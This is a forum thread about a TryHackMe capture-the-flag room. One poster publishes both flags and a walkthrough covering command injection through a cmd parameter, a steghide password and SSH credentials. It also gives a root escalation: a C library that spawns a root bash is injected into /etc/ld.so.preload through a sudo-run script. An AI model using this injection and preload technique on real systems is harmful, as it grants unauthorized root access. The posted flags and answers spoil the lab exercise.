U.A. High School Discussion

Let’s discuss U.A. High School.

OMG no attack vector

Directory scanning, subdomain enum, parameter fuzzing, nothing gave a result

The TryHackMe staff are not able to classify challenges :grinning:

A fantasy room based on an anime. It shouldn’t even be on TryHackMe. It’s just designed to waste people’s time. I’ll share the flags and a write-up here to save you time. Please dislike the room to show that you deserve better ones

User Flag: THM{W3lC0m3_D3kU_1A_0n3f0rAll??}

Root Flag: THM{Y0U_4r3_7h3_NUm83r_1_H3r0}

Here’s a refined version of your content with grammar corrections and clarity improvements:

  1. Execute the command via /assets/index.php?cmd=ls. (wtf!!)
  2. Find the hidden image and fix its magic bytes.
  3. Use steghide to extract the data inside it. Password: AllmightForEver!!!.
  4. Using the following credentials, log in via SSH: deku:One?For?All_!!one1/A.
  5. Get the user flag.

Check sudo -l

deku@myheroacademia:/tmp$ sudo -l
[sudo] password for deku: 
Matching Defaults entries for deku on myheroacademia:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User deku may run the following commands on myheroacademia:
    (ALL) /opt/NewComponent/feedback.sh
deku@myheroacademia:/tmp$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form       
This is a way to report various problems
    Developed by                        
        The Technical Department of U.A.
Enter your feedback:
asd > test.txt

Notice that you can write files as root. We can use this to escalate privileges.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unlink("/etc/ld.so.preload");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
// cd /tmp
// gcc -fPIC -shared -o pe.so pe.c -nostartfiles

After compiling and transferring the library, copy it to /tmp and execute any binary with the SUID bit. I ran sudo to trigger the loading of the preload library.

deku@myheroacademia:/tmp$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form       
This is a way to report various problems
    Developed by                        
        The Technical Department of U.A.
Enter your feedback:
/tmp/pe.so > /etc/ld.so.preload
Feedback successfully saved.
deku@myheroacademia:/tmp$ /usr/bin/sudo
root@myheroacademia:/tmp# cd /root
root@myheroacademia:/root# ls
root.txt  snap
root@myheroacademia:/root# cat root.txt

For an easier privilege escalation technique, you can also check this write-up.

why the /assets path so tricky? really frustrating!